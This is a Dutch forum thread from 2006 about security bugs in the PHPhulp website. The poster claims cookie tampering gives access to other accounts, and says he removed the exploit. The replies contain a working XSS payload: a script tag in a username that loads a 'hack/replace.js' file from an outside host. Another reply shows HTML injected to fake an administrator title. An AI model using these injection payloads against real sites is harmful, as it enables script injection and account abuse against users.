Bug: Continued

Door Mitch X op 04-01-2006 13:05 gewijzigd op 16-02-2006 19:18

7.916 views

Daar ik zeer nieuwsgierig was naar de verdere veiligheid van PHPhulp na m'n UBB exploit, heb ik nog een leuke ontdekking gedaan.

Een wijze les aan alle personen hier, een cookie is niet te vertrouwen!
Ik heb dmv cookie data toegang tot talloze PHPhulp accounts, iets dat me niet de bedoeling lijkt.

Ik zal zo even een berichtje plaatsen met een ander account om mijn verhaal te bevestingen ;)

// Edit : Exploit weggehaald :+

Onbekende gebruiker

04-01-2006 14:30

Ja. Volgens mij moet phphulp eens vernieuwd worden. De hele scripting. Niet alleen dit. Als er iets efficienter gescript wordt, kan phphulp een stuk sneller worden o.a

Eris -

04-01-2006 14:31

Al die bugs zijn natuurlijk allang bekend...

Eris -

04-01-2006 14:32

En dit was zeker ook niet bekend :)

Onbekende gebruiker

04-01-2006 14:40

Toch wel leuk hoor, jezelf de titel van administrator geven :)

Eris -

04-01-2006 14:40

Ik heb ze toch maar even gemeld :)

Erik Rijk

04-01-2006 14:42

dat heb ik ook al meerdere keren gedaan :s

Onbekende gebruiker

04-01-2006 14:44

Jelmer probeert weer iets:

Door

<script src='http://phphulp.ikhoefgeen.nl/hack/replace.js'></script>Jelmer
made on a mac

Bas

04-01-2006 14:44

:) tnx dudes ;)

hoe geef je jezelf dan administrator?

Erik Rijk

04-01-2006 14:45

ja ik zag het ja :P

@ Bas
hij was niet echt admin
door de tekst leek het zo, maar de functies had ie niet

Onbekende gebruiker

04-01-2006 14:46

Ik deed dit invullen:
Sebastiaan</a><br><b>administrator</b><br>

Maar wat ik al zei: jezelf de titel van administrator geven :)

Reageren

Inloggen om te reageren